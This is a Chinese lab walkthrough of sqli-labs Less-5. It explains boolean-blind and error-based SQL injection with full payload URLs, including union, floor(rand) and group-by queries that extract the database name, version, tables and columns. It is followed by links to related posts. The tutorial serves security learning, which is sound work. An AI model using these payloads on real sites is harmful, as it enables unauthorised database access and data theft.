2. 程式人生 > 其它 >Less-5

Less-5

阿新 發佈:2022-03-24

Less-5

第五關:Please input the ID as parameter with numeric value 

 

(1)判斷注入點閉合方式

正常輸入:

 

輸入特殊字元:

 

由此判斷閉合方式為單引號包裹

 

輸入錯誤引數:

 

 

(2)注入型別

由於頁面沒有回顯位置,只能根據正確與否顯示的頁面資訊判斷,所以這裡考慮使用盲注的方式

 

#布林盲注
http://192.168.88.133/mysqli-labs/Less-5/?id=1' and 1=2  --+
http://192.168.88.133/mysqli-labs/Less-5/?id=1' and 1=1  --+
 


#通過上面已經知道了閉合方式,所以也可以使用這種方式來判斷是否注入成功

 

 

(3)布林盲注

#使用length() 方法
http://192.168.88.133/mysqli-labs/Less-5/?id=1' and length(database()) >10  --+

#我們知道資料庫名長度為8,可以通過二分法來修改長度判斷資料庫名長度

 

 

介紹幾個方法:

mid():MID(string or text, start, length)
substring():SUBSTRING(input_string, start, length)
ord():ascii碼值
ascii():同上

 

#判斷資料庫名名稱
http://192.168.88.133/mysqli-labs/Less-5/?id=1' and  ord(mid(database(),1,1))=115  --+

#這種人工注入比較麻煩,所以一般使用python指令碼或可以使用burp的模組進行暴力,這裡不做演示。

 

(4)報錯注入

介紹三種常用的報錯函式

1.updatexml(XML_document,XPath_string,new_value) 
2.extractvalue(XML_document,xpath_string)
3.floor(rand(0)*2) :原理科參考https://www.freebuf.com/articles/web/257881.html
 


注::前兩個方法輸出字元會被限制在32個字元,第三個語句將 輸出字元長度限制為64個字元


 

爆庫:

 

 

 

考慮使用第三種方式:

 

 

#檢視資料庫資訊
http://192.168.88.133/mysqli-labs/Less-5/?id=-1'  union select count(*), 1,concat(0x3a,(select database()),0x3a,version(),floor(rand(0)*2)) as x from information_schema.tables   group by x   --+

#表資訊
http://192.168.88.133/mysqli-labs/Less-5/?id=-1'  union select count(*), 1,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) as x from information_schema.tables   group by x   --+

#列資訊相似更換concat第一個查詢的欄位內容即可
http://192.168.88.133/mysqli-labs/Less-5/?id=-1'  union select count(*), 1,concat((select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand(0)*2)) as x from information_schema.tables   group by x   --+

#注 limit 處來顯示不同內容,調整第一個引數即可

 

 

 

 

 

 

 

 

 

注:如果有方法上(concat等)的使用不理解的建議百度瞭解更多再回頭看,,,,歡迎指正和交流~~ 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

相關推薦

Less-5-02

0x01判斷注入型別 字元型_單引號_雙注入 ?id=1 ?id=1\' ?id=1" 單引號字元型注入,1,3顯示youarein,2單引號報錯

Less-5-03

0x01 extractvalue()報錯注入 extractvalue(1,concat(0x7e,(select database()),0x7e)) 爆資料庫: ?id=-1\' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

sqli-lbs:Less-5~10 Double Query- Single Quotes- String

第五關:Double Query- Single Quotes- String 1.輸入?id=2看見頁面如下:輸入?id=666時,發現頁面發生變化 說明頁面沒有顯示位。無法使用聯合查詢注入 2.接著我們嘗試在URL中輸入 ?id=2’ 頁面出現錯誤語句

Less-5闖關失敗

這個闖關過程除了問題,用以上方法只能猜到第四位,無法完整的猜完整個資料庫版本。搜了很多,沒有找到答案,有知道的評論一下。等我換個方法再出一個第五關的闖關教程

Less-5

Less-5 第五關:Please input the ID as parameter with numeric value    (1)判斷注入點閉合方式

There were 5 failed launches in a row, each lasting less than 300 seconds. Giving up

技術標籤:mycat連線異常mysql 問題:mycat無法執行,Navicat無法連線mycat 在啟動mycat是後顯示的是mycat正在執行,但是Navicat還是無法連線,繼而檢視mycat的狀態,發現mycat的服務並不在執行。

分庫分表的5大方案,百度、騰訊、阿里等大廠都在用!

資料庫瓶頸 不管是IO瓶頸,還是CPU瓶頸,最終都會導致資料庫的活躍連線數增加,進而逼近甚至達到資料庫可承載活躍連線數的閾值。在業務Service來看就是,可用資料庫連線少甚至無連線可用。接下來就可以想象了吧(併發

價值超5萬的撮合引擎:開篇

前言 自從有人在微信群裡開價5萬求購Golang版的撮合引擎之後,我就想自己開發一款,畢竟,以我的經驗來說,開發個高效能的撮合引擎並沒什麼難度。

5. 彤哥說netty系列之Java NIO核心元件之Channel

你好,我是彤哥,本篇是netty系列的第五篇。 簡介 上一章我們一起學習瞭如何使用Java原生NIO實現群聊系統,這章我們一起來看看Java NIO的核心元件之一——Channel。

Alibaba Arthas 3.1.5版本支援火焰圖,快速定位應用熱點

Arthas是Alibaba開源的Java診斷工具,深受開發者喜愛。 Github: github.com/alibaba/art…

5 分鐘快速學習,快取的正確使用方式!

快取操作 讀快取 讀快取可以分為兩種情況命中(cache hit)和未命中(cache miss):

MXFlutter0.2.5支援直接編譯FlutterUI為可執行的JS程式碼

MXFlutter v0.2.5 釋出配套 mxjsbuilder v0.0.2 編譯器,支援編譯 Flutter 工程為 mxflutter 可執行的 JS 程式碼。

資料結構與演演算法5 -- 棧練習題

前言 上一篇文章中講述了棧和佇列的概念,並且也用程式碼演示瞭如何分別使用順序儲存和鏈式儲存定義棧結構和佇列結構。

Runtime原始碼解讀5(屬性)

2019-10-15 屬性(property)是為類的成員變數提供公開的訪問器。屬性與方法有非常緊密的聯絡,可讀寫的屬性有 getter 和 setter 兩個方法與之對應。

Swift 5.2 新診斷框架

本文由知乎網友“漫慢忙”翻譯自官方部落格 《New Diagnostic Architecture Overview》

2019年Java面試題基礎系列228道(5),快看看哪些你還不會?

2019年Java面試題基礎系列228道 Java面試題(一) 第一篇更新1~20題的答案解析 juejin.im/post/5de8c6…

如何解決Redis快取雪崩、快取穿透、快取併發等5大難題

快取雪崩 資料未載入到快取中,或者快取同一時間大面積的失效,從而導致所有請求都去查資料庫,導致資料庫CPU和記憶體負載過高,甚至宕機。

Redis的概述、搭建及簡單使用(基於CentOS 6.5 Linux)

1、Redis 簡介 Redis 是完全開源免費的,遵守BSD協議,是一個高效能的key-value資料庫。

Java單元測試之JUnit 5快速上手

前言 單元測試是軟體開發中必不可少的一環,但是在平常開發中往往因為專案週期緊,工作量大而被選擇忽略,這樣往往導致軟體問題層出不窮。線上出現的不少問題其實在有單元測試的情況下就可以及時發現和處理,因此培養

PHP 5 Dockerfile 改造過程

簡介 業務 API 1.0 服務,因伺服器遷移需要對線上服務編寫Dockerfile 進行容器化改造,由於之前接觸 Docker 較少,故用本檔案記錄 Dockerfile 編寫過程。